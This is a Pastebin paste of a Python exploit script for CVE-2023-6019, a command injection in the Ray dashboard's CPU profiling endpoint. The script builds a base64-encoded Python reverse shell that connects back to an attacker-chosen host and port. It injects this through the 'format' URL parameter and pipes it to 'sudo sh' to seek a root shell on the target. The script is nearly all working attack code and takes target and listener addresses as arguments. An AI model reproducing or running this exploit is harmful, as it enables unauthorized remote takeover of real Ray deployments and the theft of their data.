Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
- # Description:
- # The Ray Project dashboard contains a CPU profiling page, and the format parameter is
- # not validated before being inserted into a system command executed in a shell, allowing
- # for arbitrary command execution. If the system is configured to allow passwordless sudo
- # (a setup some Ray configurations require) this will result in a root shell being returned
- # to the user. If not configured, a user level shell will be returned
- # Version: <= 2.6.3
- # Date: 2024-4-10
- # Exploit Author: Fire_Wolf
- # Tested on: Ubuntu 20.04.6 LTS
- # Vendor Homepage: https://www.ray.io/
- # Software Link: https://github.com/ray-project/ray
- # CVE: CVE-2023-6019
- # Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe
- # ==========================================================================================
- # !usr/bin/python3
- # coding=utf-8
- import base64
- import argparse
- import requests
- import urllib3
- proxies = {"http": "127.0.0.1:8080"}
- headers = {
- "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
- }
- def check_url(target, port):
- target_url = target + ":" + port
- https = 0
- if 'http' not in target:
- try:
- urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
- test_url = 'http://' + target_url
- response = requests.get(url=test_url, headers=headers, verify=False, timeout=3)
- if response.status_code != 200:
- is_https = 0
- return is_https
- except Exception as e:
- print("ERROR! The Exception is:" + format(e))
- if https == 1:
- return "https://" + target_url
- else:
- return "http://" + target_url
- def exp(target,ip,lhost, lport):
- payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''
- print("[*]Payload is: " + payload)
- b64_payload = base64.b64encode(payload.encode())
- print("[*]Base64 encoding payload is: " + b64_payload.decode())
- exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh`'
- # response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess)
- print(exp_url)
- urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
- response = requests.get(url=exp_url, headers=headers, verify=False)
- if response.status_code == 200:
- print("[-]ERROR: Exploit Failed,please check the payload.")
- else:
- print("[+]Exploit is finished,please check your machine!")
- if __name__ == '__main__':
- parser = argparse.ArgumentParser(
- description='''
- ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀
- ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
- ⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄
- ⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃
- ⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄
- ⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄
- ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀
- ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
- ''',
- formatter_class=argparse.RawDescriptionHelpFormatter,
- )
- parser.add_argument('-t', '--target', type=str, required=True, help='tart ip')
- parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port')
- parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip')
- parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port')
- args = parser.parse_args()
- # target = args.target
- ip = args.target
- # port = args.port
- # lhost = args.lhost
- # lport = args.lport
- targeturl = check_url(args.target, args.port)
- print(targeturl)
- print("[*] Checking in url: " + targeturl)
- exp(targeturl, ip, args.lhost, args.lport)
Add Comment
Please, Sign In to add comment
